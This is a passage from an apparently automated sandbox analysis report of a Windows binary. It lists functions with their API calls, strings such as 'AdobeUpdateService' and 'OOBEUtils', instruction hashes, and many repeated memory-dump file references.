                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: DirectoryPath$CreateExistsFile
                                                                                                                                                                                                                                                                    • String ID: FileUtils$OOBEUtils$SHCreateDirectoryEx failed. Error: %d
                                                                                                                                                                                                                                                                    • API String ID: 3984196470-716391998
                                                                                                                                                                                                                                                                    • Opcode ID: e2f3c0152dea6573d78a5f9b5d09177c3ec5f57044b8f182ed452466184478f4
                                                                                                                                                                                                                                                                    • Instruction ID: 1c360898109e8edf91c6b2f0d6b286c19c2d4d721b312238894a1274079c5597
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2f3c0152dea6573d78a5f9b5d09177c3ec5f57044b8f182ed452466184478f4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0119B3174522097CA249B55BD4AF4B3758AFC2F51B5504ABFC4557391CA68AC40CABC
                                                                                                                                                                                                                                                                    Function 004151D0 Relevance: 10.6, APIs: 7, Instructions: 50COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 004151DB
                                                                                                                                                                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000,?,00414C7F,?), ref: 004151E9
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 004151F7
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 00415205
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 00415212
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00414C7F,?), ref: 00415226
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00414C7F,?), ref: 0041523F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle$BlockDestroyEnvironment
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1096182194-0
                                                                                                                                                                                                                                                                    • Opcode ID: e2e22a70dbd95b21f456f59282a0213a811955f47d7c623cdfc0833d9dcf18cc
                                                                                                                                                                                                                                                                    • Instruction ID: 34402626d38a9728df7e9b11658db42f6f8f7e161e27eba0645d41ce3f5bf331
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2e22a70dbd95b21f456f59282a0213a811955f47d7c623cdfc0833d9dcf18cc
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5501D371B00B11EBDB209F76EC48B9777ECBF54B41304493AB956E3650EA78E8408A69
                                                                                                                                                                                                                                                                    Function 0041FB30 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 84COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,0041FAA0,00000000,00000008,00405984), ref: 0041FBA7
                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,0041FAA0,00000000,00000008,00405984), ref: 0041FC27
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                    • String ID: Closing inPipe %p$Closing outPipe %p$CommBridge$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 2962429428-1143323105
                                                                                                                                                                                                                                                                    • Opcode ID: 2a3135dafd0f9304286105df91380c5b5f1a53f32146d0c127ed63ac37bcf816
                                                                                                                                                                                                                                                                    • Instruction ID: 0f7ac151626cc6776e72673ec142dc1ae90cb188b2ca2df04446cdc6e3645632
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a3135dafd0f9304286105df91380c5b5f1a53f32146d0c127ed63ac37bcf816
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C421F630740311A7CA20EF259D66F9B3654BB41B00F14017BF912A72E1CBACBD5286ED
                                                                                                                                                                                                                                                                    Function 004018B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106registryCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • RegisterServiceCtrlHandlerW.ADVAPI32(AdobeUpdateService,00401DB0), ref: 00401942
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 004019A0
                                                                                                                                                                                                                                                                      • Part of subcall function 00401770: SetServiceStatus.ADVAPI32(004C8C64), ref: 00401821
                                                                                                                                                                                                                                                                      • Part of subcall function 00401770: GetLastError.KERNEL32 ref: 00401877
                                                                                                                                                                                                                                                                      • Part of subcall function 00401A30: GetLastError.KERNEL32(00000000,00000001,?,00401A1C), ref: 00401AC7
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    • ServiceMain: Failed to register the service with Register Service Control Handler with %d, xrefs: 004019A7
                                                                                                                                                                                                                                                                    • ServiceMain: Started, xrefs: 00401922
                                                                                                                                                                                                                                                                    • AdobeUpdateService, xrefs: 0040193D
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$Service$CtrlHandlerRegisterStatus
                                                                                                                                                                                                                                                                    • String ID: AdobeUpdateService$ServiceMain: Failed to register the service with Register Service Control Handler with %d$ServiceMain: Started
                                                                                                                                                                                                                                                                    • API String ID: 125077777-3162937321
                                                                                                                                                                                                                                                                    • Opcode ID: b74a3c793bce63fd3287ecdf9c99267635b26962f32db75fa19738fde18ddafd
                                                                                                                                                                                                                                                                    • Instruction ID: a0a6ef52c26ab5d4a2a010d99244e849a5362b380fe035aef843cf64b66cd91c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b74a3c793bce63fd3287ecdf9c99267635b26962f32db75fa19738fde18ddafd
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25311171A40215ABE300DF6AED46B5A77A4EB55714F14423FE804A73D0EFB86904CBA9
                                                                                                                                                                                                                                                                    Function 0040B280 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70synchronizationCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,?,?,?,?,00404417,000000FF,000000FF,?,?), ref: 0040B317
                                                                                                                                                                                                                                                                    • ResetEvent.KERNEL32(?,?,?,00404417,000000FF,000000FF,?,?), ref: 0040B32E
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: EventObjectResetSingleWait
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in WaitforEvent $OOBEEvents$OOBEUtils
                                                                                                                                                                                                                                                                    • API String ID: 3162950495-832234452
                                                                                                                                                                                                                                                                    • Opcode ID: c206187707b054cee0fab18e90408e3dcbedc60c60ed156cedcffc0df12259e5
                                                                                                                                                                                                                                                                    • Instruction ID: ed9a0f1cae05966dad16be02516542e9fa838564d8aed4eb53f716a594107257
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c206187707b054cee0fab18e90408e3dcbedc60c60ed156cedcffc0df12259e5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C11108317802155BEB208B599C47B5A7748EB01B31F6407BBFC69E72D0CB65AC1046DC
                                                                                                                                                                                                                                                                    Function 00403E40 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 60COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710169833.00000000005E8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710258044.0000000000658000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710298093.000000000065B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710335665.0000000000663000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710380381.0000000000666000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710420594.000000000066B000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710485860.000000000066E000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710523084.0000000000674000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710564371.0000000000679000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710608002.00000000006A8000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710646490.00000000006AB000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2710694404.00000000006D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_25_2_400000_678f1ad3-4458-46d8-ad95-b8d4b2696f10.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Event
                                                                                                                                                                                                                                                                    • String ID: NULL OOBE_Event_t object passed in SetEvnt $OOBEEvents$OOBEUtils$readDataCallBack : Setting event for read data callback
                                                                                                                                                                                                                                                                    • API String ID: 4201588131-2675428969
                                                                                                                                                                                                                                                                    • Opcode ID: 8d0fe7199531401063d2ff202e2e47731f7e3bb82e1b5197b15312e4f729c641
                                                                                                                                                                                                                                                                    • Instruction ID: 4701acb43a26968b7f86df0609fe2f1396b750fb55ec2d1e5461187ebc36528e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d0fe7199531401063d2ff202e2e47731f7e3bb82e1b5197b15312e4f729c641
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7101A532780224ABC6109B59EC42A5B7B5CEF65B137140077FA09A72D0CB7ABD508BED
                                                                                                                                                                                                                                                                    Function 00403EF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 114COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,A11C6AE6,00000000,00000008,00000000,00497500,000000FF,?,004059AA), ref: 00403F86
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000019.00000002.2709445495.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709362323.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709604551.000000000049E000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709659543.00000000004C4000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709701311.00000000004C5000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000004CA000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.0000000000552000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000056C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.000000000059D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000019.00000002.2709744411.00000000005A5000.00000002.00000001.01000000.0000000F.sdmpDownload File
